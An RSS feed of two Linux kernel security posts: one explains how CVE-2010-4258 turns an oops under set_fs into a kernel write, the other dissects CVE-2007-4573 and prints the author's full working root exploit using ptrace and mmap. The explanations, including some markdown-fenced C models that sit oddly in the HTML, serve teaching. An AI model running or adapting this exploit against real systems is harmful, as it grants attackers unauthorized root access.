<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Made of Bugs &#187; cve</title>
	<atom:link href="http://blog.nelhage.com/tag/cve/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.nelhage.com</link>
	<description>It's software. It's made of bugs.</description>
	<lastBuildDate>Thu, 18 Aug 2011 21:57:23 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>CVE-2010-4258: Turning denial-of-service into privilege escalation</title>
		<link>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/</link>
		<comments>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/#comments</comments>
		<pubDate>Fri, 10 Dec 2010 16:02:11 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[bugs]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[full-nelson]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=418</guid>
		<description><![CDATA[Dan Rosenberg recently released a privilege escalation exploit for Linux, based on three different kernel vulnerabilities I reported recently. This post is about CVE-2010-4258, the most interesting of them, and, as Dan writes, the reason he wrote the exploit in the first place. In it, I&#8217;m going to do a brief tour of the various [...]]]></description>
			<content:encoded><![CDATA[<p>Dan Rosenberg recently <a href="http://thread.gmane.org/gmane.comp.security.full-disclosure/76457">released</a> a privilege escalation exploit
for Linux, based on three different kernel vulnerabilities I reported
recently. This post is about CVE-2010-4258, the most interesting of them, and,
as Dan writes, the reason he wrote the exploit in the first place. In it, I&#8217;m
going to do a brief tour of the various kernel features that collided to make
this bug possible, and explain how they combine to turn an otherwise-boring oops
into privilege escalation.</p>

<h2><code>access_ok</code></h2>

<p>When a user application passes a pointer to the kernel, and the kernel
wants to read or write from that pointer, the kernel needs to perform
various checks that a buggy or malicious userspace app hasn&#8217;t passed
an &#8220;evil&#8221; pointer.</p>

<p>Because the kernel and userspace run in the same address space, the
most important check is simply that the pointer points into the
&#8220;userspace&#8221; part of the address space. User applications are protected
by page table permissions from writing into kernel memory, but the
kernel isn&#8217;t, and so must explicitly check that any pointers given to
it by a user don&#8217;t point into the kernel region.</p>

<p>The address space is laid out such that user applications get the
bottom portion, and the kernel gets the top, so this check is a simple
comparison against that boundary. The kernel function that performs
this check is called <code>access_ok</code>, although there are various other
functions that do the same check, implicitly or otherwise.</p>
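<p>As a rough illustration, the boundary check can be modeled in ordinary userspace C. This is a sketch of the idea only, not the kernel's implementation: <code>model_access_ok</code> and <code>MODEL_USER_LIMIT</code> are hypothetical names, and the limit value is an assumed example for a 64-bit address space.</p>

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical top of the userspace half of a 64-bit address space. */
#define MODEL_USER_LIMIT 0x00007ffffffff000ULL

/*
 * Return true if the byte range [addr, addr + size) lies entirely below
 * `limit`. The comparison is arranged so that addr + size is never
 * computed, which keeps a huge size from wrapping around.
 */
bool model_access_ok(uint64_t addr, uint64_t size, uint64_t limit)
{
        return size <= limit && addr <= limit - size;
}

/* Small self-check covering the three interesting cases. */
void model_access_ok_demo(void)
{
        /* An ordinary user buffer is accepted. */
        assert(model_access_ok(0x400000, 4096, MODEL_USER_LIMIT));
        /* A pointer into the kernel half is rejected. */
        assert(!model_access_ok(0xffffffff80000000ULL, 8, MODEL_USER_LIMIT));
        /* A size large enough to wrap the address space is rejected. */
        assert(!model_access_ok(0x400000, UINT64_MAX, MODEL_USER_LIMIT));
}
```

<p>Passing the limit as a parameter, rather than hard-coding it, is deliberate in this sketch: the limit is exactly the value that the override discussed in the next section changes.</p>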

<h2><code>get_fs()</code> and <code>set_fs()</code></h2>

<p>Occasionally, however, the kernel finds it useful to change the rules for what
<code>access_ok</code> will allow. <code>set_fs()</code><sup><a href="#fn.1" class="footnote" name="fnr.1">1</a></sup> is an internal Linux function that is used to
override the definition of the user/kernel split, for the current process.</p>

<p>After a <code>set_fs(KERNEL_DS)</code>, no checking is performed that user pointers
point to userspace &#8212; <code>access_ok</code> will always return
true. <code>set_fs(KERNEL_DS)</code> is mainly used to enable the kernel to wrap
functions that expect user pointers, by passing them pointers into the
kernel address space. A typical use reads something like this:</p>

<pre><code>old_fs = get_fs(); set_fs(KERNEL_DS);
vfs_readv(file, kernel_buffer, len, &amp;pos);
set_fs(old_fs);
</code></pre>

<p><code>vfs_readv</code> expects a user-provided pointer, so without the <code>set_fs()</code>, the
<code>access_ok()</code> inside <code>vfs_readv()</code> would fail on our kernel buffer. We use
<code>set_fs()</code> to temporarily disable that checking.</p>

<h2>Kernel oopses</h2>

<p>When the kernel oopses, perhaps because of a <code>NULL</code> pointer
dereference in kernelspace, or because of a call to the <code>BUG()</code> macro
to indicate an assertion failure, the kernel attempts to clean up, and
then kills the current process by calling the <code>do_exit()</code>
function.</p>

<p>When the kernel does so, it&#8217;s still running in the same process
context it was in before the oops occurred, including any <code>set_fs()</code>
override, if applicable. That means <code>do_exit</code> will get called
with <code>access_ok</code> disabled &#8212; not something anyone expected when they
wrote the individual pieces of this system.</p>

<h2><code>clear_child_tid</code></h2>

<p>As it turns out, <code>do_exit</code> contains a write to a user-controlled
address that expects <code>access_ok</code> to be working properly!</p>

<p><code>clear_child_tid</code> is a feature where, on thread exit, the kernel can
be made to write a zero into a specified address in that thread&#8217;s
address space, in order to notify other threads of that exit.</p>

<p>This is implemented by simply storing a pointer to the to-be-zeroed
address inside <code>struct task_struct</code> (which represents a single thread
or process), and, on exit, <code>mm_release</code>, called from <code>do_exit</code>, does:</p>

<pre><code>put_user(0, tsk-&gt;clear_child_tid);
</code></pre>

<p>This is normally safe, because <code>put_user</code> checks that its second
argument falls into the &#8220;userspace&#8221; segment before doing a write. But,
if we are running with <code>get_fs() == KERNEL_DS</code>, it will happily accept
any address at all, even one pointing into kernel space.</p>

<p>So, if we find any kernel <code>BUG()</code> or <code>NULL</code> dereference, or other page
fault, that we can trigger after a <code>set_fs(KERNEL_DS)</code>, we can trick
the kernel into a user-controlled write into kernel memory!</p>
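<p>The interaction can be sketched as a toy userspace model. Everything here is hypothetical and simplified for illustration (a 64-byte "address space", the <code>model_*</code> names, a fixed target offset of 40); it mirrors only the logic described above, not the kernel's actual code.</p>

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Toy address space: the low half is "user", the high half is "kernel". */
#define MEM_SIZE   64u
#define USER_DS    32u        /* normal limit: user half only */
#define KERNEL_DS  MEM_SIZE   /* override: every address passes */

struct model_task {
        uint32_t addr_limit;       /* the value set_fs() changes */
        uint32_t clear_child_tid;  /* address chosen by userspace */
};

static uint8_t memory[MEM_SIZE];

/* Like put_user(): refuse the write unless it fits below addr_limit. */
int model_put_user(struct model_task *t, uint32_t val, uint32_t addr)
{
        if (addr > t->addr_limit || sizeof(val) > t->addr_limit - addr)
                return -1;  /* the kernel would return -EFAULT here */
        memcpy(&memory[addr], &val, sizeof(val));
        return 0;
}

/* Like the mm_release() step of do_exit(): zero the registered address. */
int model_do_exit(struct model_task *t)
{
        return model_put_user(t, 0, t->clear_child_tid);
}

/* Exit with a clear_child_tid that points into the "kernel" half. */
int model_exit_with_limit(uint32_t limit)
{
        struct model_task t = { .addr_limit = limit, .clear_child_tid = 40 };

        assert(limit <= MEM_SIZE);
        memset(memory, 0xff, sizeof(memory));
        return model_do_exit(&t);
}

/* Reports whether the four "kernel" bytes at offset 40 were zeroed. */
int model_kernel_word_cleared(void)
{
        static const uint8_t zero[4];
        return memcmp(&memory[40], zero, sizeof(zero)) == 0;
}
```

<p>In this model, <code>model_exit_with_limit(USER_DS)</code> fails and leaves the "kernel" bytes alone, while <code>model_exit_with_limit(KERNEL_DS)</code>, standing in for an oops that happens under a segment override, succeeds and zeroes them.</p>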

<h2><code>splice()</code> et al.</h2>

<p>An obvious question at this point is: How much of the kernel can an
attacker cause to run with <code>get_fs() == KERNEL_DS</code>?</p>

<p>There are a number of small special cases. For example, the binary
sysctl compatibility code works by calling the normal <code>/proc/</code> write
handlers from kernelspace, under <code>set_fs()</code>. A handful of compat-mode
(32 on 64) syscalls work similarly.</p>

<p>By far the biggest source I&#8217;ve found, however, is the <code>splice()</code>
system call. The <code>splice()</code> system call is a relatively recent
addition to Linux, and allows for zero-copy transfer of pages between
a pipe and another file descriptor.</p>
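<p>For readers who have not used it, here is a minimal sketch of ordinary <code>splice()</code> usage on Linux: moving bytes from a pipe into a regular file. The helper name <code>splice_roundtrip</code> and the temporary file path are assumptions made for this example, and it is only meant for short messages that fit in the pipe buffer.</p>

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * Write `msg` into a pipe, splice() it from the pipe into a temporary
 * file, then read the file back into `out`. Returns the number of bytes
 * read back, or -1 on any failure.
 */
ssize_t splice_roundtrip(const char *msg, char *out, size_t outlen)
{
        char path[] = "/tmp/splice-demo-XXXXXX";
        int pipefd[2];
        ssize_t n = -1;
        size_t len;
        int fd;

        assert(msg != NULL && out != NULL);
        len = strlen(msg);

        fd = mkstemp(path);
        if (fd < 0)
                return -1;
        unlink(path);  /* the file lives only as long as fd stays open */

        if (pipe(pipefd) == 0) {
                /* Fill the pipe, then move its contents into the file. */
                if (write(pipefd[1], msg, len) == (ssize_t)len &&
                    splice(pipefd[0], NULL, fd, NULL, len, 0) == (ssize_t)len)
                        n = pread(fd, out, outlen, 0);
                close(pipefd[0]);
                close(pipefd[1]);
        }
        close(fd);
        return n;
}
```

<p>One end of a <code>splice()</code> must always be a pipe; the other end here is a regular file, but it could equally be a socket or another kind of file descriptor.</p>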

<p>As of 2.6.31, an attempt to <code>splice()</code> to or from an fd that doesn&#8217;t
have special support for zero-copy <code>splice</code> will fall
back on doing an ordinary <code>read()</code>, <code>write()</code>, or <code>sendmsg()</code> on the
fd &#8230; from the kernel, using <code>set_fs()</code> in order to pass in kernel
buffers.</p>

<p>What that means is that by using <code>splice()</code>, an attacker can call the
bulk of the code in most obscure filesystems and socket types (which
tend not to have explicit <code>splice()</code> support) with a segment override
in place. Conveniently for an attacker, that is also exactly a
description of where the bulk of the random security bugs tend to be.</p>

<p>This is also exactly the technique Dan&#8217;s exploit uses. He uses
CVE-2010-3849, an otherwise boring <code>NULL</code> pointer dereference I
reported in the Econet network protocol. His exploit code does a
<code>splice()</code> to an econet socket, causing the <code>econet_sendmsg</code> handler to
get called under <code>set_fs(KERNEL_DS)</code>. When it oopses, <code>do_exit</code> is
called, and he gets a user-controlled write into kernel
memory. Everything else is just details.</p>

<p><div id="footnotes">
<h2 class="footnotes">Footnotes: </h2>
<div id="text-footnotes">
<p class="footnote"><sup><a class="footnum" name="fn.1" href="#fnr.1">1</a></sup> Back in Linux 1.x, this function actually set the <tt>%fs</tt> register on i386. It hasn&#8217;t in years, but it&#8217;s used in too many places for changing the name to be worth it.</p>
</div></div></p>


]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>CVE-2007-4573: The Anatomy of a Kernel Exploit</title>
		<link>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/</link>
		<comments>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/#comments</comments>
		<pubDate>Sat, 06 Feb 2010 03:32:31 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[C]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=99</guid>
		<description><![CDATA[CVE-2007-4573 is two years old at this point, but it remains one of my favorite vulnerabilities. It was a local privilege-escalation vulnerability on all x86_64 kernels prior to v2.6.22.7. It&#8217;s very simple to understand with a little bit of background, and the exploit is super-simple, but it&#8217;s still more interesting than Yet Another NULL Pointer [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4573">CVE-2007-4573</a>
is two years old at this point, but it remains one of my favorite
vulnerabilities. It was a local privilege-escalation vulnerability on
all <code>x86_64</code> kernels prior to <code>v2.6.22.7</code>. It&#8217;s very simple to
understand with a little bit of background, and the exploit is
super-simple, but it&#8217;s still more interesting than Yet Another NULL
Pointer Dereference. Plus, it was the first kernel bug I wrote an
exploit for, which was fun.</p>

<p>In this post, I&#8217;ll write up my exploit for CVE-2007-4573, and try to
give enough background for someone with some experience with C, Linux,
and a bit of x86 assembly to understand what&#8217;s going on. If you&#8217;re an
experienced kernel hacker, you probably won&#8217;t find much new here, but
if you&#8217;re not, hopefully you&#8217;ll get a sense for some of the pieces
that go into a kernel exploit.</p>

<h2>The patch</h2>

<p>I&#8217;ll start out with the patch, or rather a slightly simplified
version, that omits some hunks that will be irrelevant for my
discussion. Then I&#8217;ll explain the context for the patch, and by that
point we&#8217;ll have enough context to understand the exploit code.</p>

<p>A simplified version of the patch follows. (The original is
<a href="http://git.kernel.org/linus/176df2457ef6207156ca1a40991c54ca01fef567"><code>176df245</code></a>
in Linus&#8217;s git repository.) Note that this patch was applied to v2.6.22
&#8211; these files have moved around since, so pull out an older kernel if
you&#8217;re trying to follow along at home:</p>

<pre><code>--- a/arch/x86_64/ia32/ia32entry.S
+++ b/arch/x86_64/ia32/ia32entry.S
@@ -38,6 +38,18 @@
        movq    %rax,R8(%rsp)
        .endm

+       .macro LOAD_ARGS32 offset
+       movl \offset(%rsp),%r11d
+       movl \offset+8(%rsp),%r10d
+       movl \offset+16(%rsp),%r9d
+       movl \offset+24(%rsp),%r8d
+       movl \offset+40(%rsp),%ecx
+       movl \offset+48(%rsp),%edx
+       movl \offset+56(%rsp),%esi
+       movl \offset+64(%rsp),%edi
+       movl \offset+72(%rsp),%eax
+       .endm
@@ -334,7 +346,7 @@ ia32_tracesys:
        movq $-ENOSYS,RAX(%rsp) /* really needed? */
        movq %rsp,%rdi        /* &amp;pt_regs -&gt; arg1 */
        call syscall_trace_enter
-       LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
+       LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
        RESTORE_REST
        jmp ia32_do_syscall
 END(ia32_syscall)
</code></pre>

<p>The patch defines the <code>LOAD_ARGS32</code> macro, and replaces <code>LOAD_ARGS</code>
with it in several places (I&#8217;ve only shown one for
simplicity). <code>LOAD_ARGS32</code> differs only slightly from the <code>LOAD_ARGS</code>
macro that it is replacing, which is defined in
<code>include/asm-x86_64/calling.h</code>:</p>

<pre><code>.macro LOAD_ARGS offset
movq \offset(%rsp),%r11
movq \offset+8(%rsp),%r10
movq \offset+16(%rsp),%r9
movq \offset+24(%rsp),%r8
movq \offset+40(%rsp),%rcx
movq \offset+48(%rsp),%rdx
movq \offset+56(%rsp),%rsi
movq \offset+64(%rsp),%rdi
movq \offset+72(%rsp),%rax
.endm
</code></pre>

<p>As the name suggests, <code>LOAD_ARGS32</code> loads the registers from the stack
as 32-bit values, rather than 64-bit. Importantly, in doing so it
takes advantage of a quirk in the <code>x86_64</code> architecture, that causes
the top 32 bits of the registers to be zeroed if you write to the
32-bit versions. <code>LOAD_ARGS32</code> thus zero-extends the 32-bit values it
loads into the 64-bit registers.</p>
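<p>The difference between the two macros can be modeled in plain C. This is an illustrative sketch with hypothetical function names, treating a saved stack slot as a <code>uint64_t</code>; it relies on x86 being little-endian, so that a 32-bit load from the slot's address reads its low half.</p>

```c
#include <assert.h>
#include <stdint.h>

/* Models `movq slot, %reg`: all 64 bits of the saved slot are loaded. */
uint64_t model_load64(uint64_t saved_slot)
{
        return saved_slot;
}

/*
 * Models `movl slot, %reg32`: only the low 32 bits are read, and the
 * write to the 32-bit register clears bits 63..32 of the full register.
 */
uint64_t model_load32(uint64_t saved_slot)
{
        return (uint64_t)(uint32_t)saved_slot;
}

/* A saved slot whose upper half is non-zero shows the difference. */
void model_load_demo(void)
{
        uint64_t saved = 0x0000000100000005ULL;

        assert(model_load64(saved) == 0x0000000100000005ULL);
        assert(model_load32(saved) == 5);
}
```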

<h2>System call handling</h2>

<p>So, why is this patch so important? Let&#8217;s look at the context for the
<code>LOAD_ARGS</code> → <code>LOAD_ARGS32</code> change. <code>ia32entry.S</code> contains the
definitions for entry-points for 32-bit compatibility-mode system
calls on an <code>x86_64</code> processor. These are the system calls made by 32-bit processes
running on the 64-bit machine, or by 64-bit processes that use
old-style <code>int $0x80</code> system calls for whatever reason.</p>

<p>There are three entry points in the file, one for 32-bit <code>SYSCALL</code>
instructions, one for 32-bit <code>SYSENTER</code>, and one for <code>int $0x80</code>. They
are all very similar, and we will only consider the <code>int $0x80</code> case
here. At boot-time, Linux configures the processor so that <code>int $0x80</code>
will dispatch to the <code>ia32_syscall</code> entry point. Ignoring a bunch of
debugging information, tracing, and other junk, this entry point&#8217;s
code is fairly simple:</p>

<pre><code>ENTRY(ia32_syscall)
        movl %eax,%eax

        pushq %rax
        SAVE_ARGS 0,0,1

        GET_THREAD_INFO(%r10)
        orl   $TS_COMPAT,TI_status(%r10)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
        jnz ia32_tracesys

        cmpl $(IA32_NR_syscalls-1),%eax
        ja ia32_badsys

ia32_do_call:
        IA32_ARG_FIXUP
        call *ia32_sys_call_table(,%rax,8)

        movq %rax,RAX-ARGOFFSET(%rsp)
        jmp int_ret_from_sys_call
</code></pre>

<p><code>%eax</code>, according to Linux&#8217;s syscall convention, stores the syscall number. The <code>mov</code> zero-extends it into <code>%rax</code>, and then we save it and the syscall arguments onto the stack.</p>

<p>The next block retrieves the <code>struct thread_info</code> for the current task,  sets the <code>TS_COMPAT</code> status bit to indicate that we&#8217;re handling a 32-bit compatibility mode syscall, and then
checks the thread&#8217;s flags to determine whether this thread has been flagged for extra processing on syscall entry. If so, we jump away to
code to handle that work.</p>

<p>Next (at the <code>cmpl</code>), we check to make sure that the requested syscall is in-bounds, and branch to an error path if not.</p>

<p><code>IA32_ARG_FIXUP</code> is a simple macro that moves registers around to
translate between the Linux syscall calling convention and the
<code>x86_64</code> calling convention, which each hold arguments in different
registers. Once we&#8217;ve fixed up the registers, the <code>call</code> instruction indexes the system call table by the system call number, looks up the address stored there, and calls into it to dispatch the syscall.</p>

<p>Finally, we save the return code from the system call into the register area on the stack, and jump to code to handle the return to userspace.</p>

<hr />

<p>One thing we should notice about this code is that when we
check that the syscall is in bounds, we compare against the 32-bit
<code>%eax</code> register, but when we actually dispatch the syscall, we use
the full 64 bits in <code>%rax</code>. The <code>movl</code> at the top of the function serves to zero-extend <code>%eax</code>, so that normally, the top 32 bits of <code>%rax</code> are zero, and this distinction doesn&#8217;t matter.</p>

<p>The problem arises in the &#8220;traced&#8221; path in <code>ia32_tracesys</code>, which is (again, with some
extra code removed):</p>

<pre><code>ia32_tracesys:
        movq %rsp,%rdi        /* &amp;pt_regs -&gt; arg1 */
        call syscall_trace_enter
        LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
        jmp ia32_do_call
</code></pre>

<p>Essentially, <code>ia32_tracesys</code> just calls into the C function
<code>syscall_trace_enter</code>, with a pointer to the registers saved on the stack,
and then restores the register values from the stack and jumps back to
execute the system call.</p>

<p>Herein lies the problem. If <code>syscall_trace_enter</code> replaces the on-stack <code>%rax</code> with a 64-bit value, and <code>LOAD_ARGS</code> restores it, then the <code>%eax</code>/<code>%rax</code> distinction above becomes a problem.
As long as <code>%eax</code> is no greater than <code>(IA32_NR_syscalls-1)</code>, the bounds check passes, yet <code>%rax</code> can be much larger than the size of the syscall table, causing the <code>call</code> to index off the end of it.</p>
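<p>The mismatch between the check and the dispatch can be expressed as a small C model. The names and the table size (<code>MODEL_NR_SYSCALLS</code>) are hypothetical; only the 32-bit versus 64-bit comparison mirrors the assembly above.</p>

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define MODEL_NR_SYSCALLS 320u  /* hypothetical table size */

/* Models `cmpl $(NR-1),%eax; ja bad`: only the low 32 bits are compared. */
bool model_check_passes(uint64_t rax)
{
        return (uint32_t)rax <= MODEL_NR_SYSCALLS - 1;
}

/* Models `call *table(,%rax,8)`: the full 64-bit value is the index. */
bool model_index_in_table(uint64_t rax)
{
        return rax < MODEL_NR_SYSCALLS;
}

/* True when the check is satisfied but the index is out of range. */
bool model_escapes_table(uint64_t rax)
{
        return model_check_passes(rax) && !model_index_in_table(rax);
}

void model_check_demo(void)
{
        assert(!model_escapes_table(4));          /* ordinary syscall number */
        assert(!model_escapes_table(5000));       /* rejected by the check */
        assert(model_escapes_table(1ULL << 32));  /* low half 0, index 2^32 */
}
```

<p>Any value whose low 32 bits are a valid syscall number and whose high 32 bits are non-zero slips through, which is why zero-extending on reload closes the hole.</p>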

<h2>ptrace(2)</h2>

<p>So what happens inside <code>syscall_trace_enter</code>, and how can we take
advantage of that to load a 64-bit value into the restored <code>%rax</code>?
Well, that turns out to be the code that handles processes traced by
the <code>ptrace(2)</code> process-tracing mechanism, which among other things,
allows the tracer to stop a child process before each system call, and
inspect and modify the child&#8217;s registers before the system call proceeds.</p>

<p>Reading <code>ptrace(2)</code>, we find that we can use <code>ptrace(PTRACE_SYSCALL,…)</code>
to cause a process to execute until its next system call, and then,
once it&#8217;s stopped, we can use <code>ptrace(PTRACE_POKEUSER,…)</code> to modify
the tracee&#8217;s registers.</p>

<h2>Putting it all together</h2>

<p>So, to exploit this bug, we need to:</p>

<ul>
<li>Have a 64-bit process attach to some process with <code>ptrace</code>.</li>
<li>Use <code>PTRACE_SYSCALL</code> to stop that process at its next syscall.</li>
<li>Have the process execute an <code>int $0x80</code>.</li>
<li>Have the parent modify <code>%rax</code> in the child to a value wider than 32 bits, and
allow the child to continue.</li>
</ul>

<p>At this point, the child will index waaay off the end of the syscall
table &#8212; so far off, in fact, that it will wrap around past the end of
memory (On <code>x86_64</code>, the entire kernel is mapped into the last
2 GB of address space). Since the kernel and user programs run in the same
address space, this means that, with an appropriate choice of <code>%rax</code>, the kernel will dereference an address
in the user address space to find out the address of the function it should jump to in order to handle the system call.</p>
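<p>The wraparound is plain unsigned 64-bit arithmetic, and can be checked with a short C sketch. The function and macro names are hypothetical; the table address is the example value that appears in the listing that follows, and the user-space ceiling assumes the usual 47-bit user address range on <code>x86_64</code>.</p>

```c
#include <assert.h>
#include <stdint.h>

/* Highest user address on x86_64, assuming a 47-bit user range. */
#define MODEL_USER_TOP 0x00007fffffffffffULL

/*
 * Address read by `call *table(,%rax,8)`: table + 8 * rax, computed
 * modulo 2^64 exactly as unsigned 64-bit arithmetic does in C.
 */
uint64_t model_entry_address(uint64_t table, uint64_t rax)
{
        return table + 8 * rax;
}

void model_entry_demo(void)
{
        /* Example table address; real values vary per kernel build. */
        uint64_t table = 0xffffffff8044b8a0ULL;
        uint64_t entry = model_entry_address(table, 1ULL << 32);

        assert(entry == 0x000000078044b8a0ULL);  /* wrapped past 2^64 */
        assert(entry <= MODEL_USER_TOP);         /* lands in user space */
}
```

<p>With the index set to 2<sup>32</sup>, the scaled offset is 2<sup>35</sup>, which carries the sum past the top of the address space and back down to a low address that a user process can map.</p>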

<p>My entire exploit code follows.  This is not fully weaponized at all
&#8211; it depends on tweaking for the specific target kernel, for one, but
it works. (Well, if you can find an unpatched kernel anywhere any more
these days, it works). Nowadays, if I were writing an exploit like
this, I&#8217;d plug it into something like Brad Spengler&#8217;s
<a href="http://www.milw0rm.com/exploits/9627">Enlightenment</a>, which takes
care of most of the annoying bits of executing shell-code in-kernel to
change the current user, disable any security modules that might be
problematic, and work across kernel versions, as necessary.</p>

<pre><code>#include &lt;sys/ptrace.h&gt;
#include &lt;sys/user.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/wait.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;string.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;stddef.h&gt;

/**
 * Replace these with the values of `ia32_sys_call_table' and
 * `set_user' from /proc/kallsyms or /boot/System.map-$(uname -r)
 */
#define syscall_table 0xffffffff8044b8a0
#define set_user      0xffffffff8028d785

/*
 We don't _need_ these -- with only a little bit of cleverness, we can
 get around not knowing them, but having them will make the code
 simpler.

 set_user is defined in kernel/sys.c, and can be used to change the
 UID of the current process. We'll trick the kernel into calling it on
 our behalf, and thus avoid having to write any code to run in
 kernel-mode ourselves.
*/

#define offset        (1L &lt;&lt; 32)
#define landing       (syscall_table + 8*offset)
/*
  'offset' is the 64-bit value we will load into %rax using ptrace().

  This will cause the "call" instruction we saw above to look up the
  value stored at that index off the syscall table, which is the
  address we compute in "landing".
 */


int main() {
        if((signed long)mmap((void*)(landing&amp;~0xFFF), 4096,
                              PROT_READ|PROT_EXEC|PROT_WRITE,
                              MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,
                                0, 0) &lt; 0) {
                perror("mmap");
                exit(-1);
        }
        *(long*)landing = set_user;
        /*
          We use mmap(2) to map a page at "landing", and write a
          pointer to the set_user function there.
         */

        pid_t child;
        child = fork();
        /*
          We fork into two processes. The parent will ptrace the child, and
          the child will execute the `int 0x80` syscall.
         */
        if(child == 0) {
                ptrace(PTRACE_TRACEME, 0, NULL, NULL);
                kill(getpid(), SIGSTOP);
                /*
                  We ask for someone to trace us, and then signal
                  ourselves, which causes us to wait for our parent to
                  attach via `ptrace`.
                 */
                __asm__("movl $0, %ebx\n\t"
                        "int $0x80\n");
                /*
                  We then make an (arbitrary) syscall via int 0x80,
                  with %ebx set to 0. Linux's system call convention
                  stores the first argument in %ebx, so if all goes
                  right, when our parent mucks with %rax, this will
                  result in the kernel calling set_user(0), setting
                  our current UID to 0.
                */

                execl("/bin/sh", "/bin/sh", NULL);
                /* Once we have root, we exec a shell. */
        } else {
                wait(NULL);
                ptrace(PTRACE_SYSCALL, child, NULL, NULL);
                wait(NULL);
                ptrace(PTRACE_POKEUSER, child, offsetof(struct user, regs.orig_rax),
                        (void*)offset);
                ptrace(PTRACE_DETACH, child, NULL, NULL);
                wait(NULL);
                /*
                  All the parent needs to do is `wait` for the child
                  to stop, allow it to advance until the next syscall,
                  use `PTRACE_POKEUSER` to poke `offset` into `%rax`,
                  and then detach and let it run.
                 */
        }
}
</code></pre>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

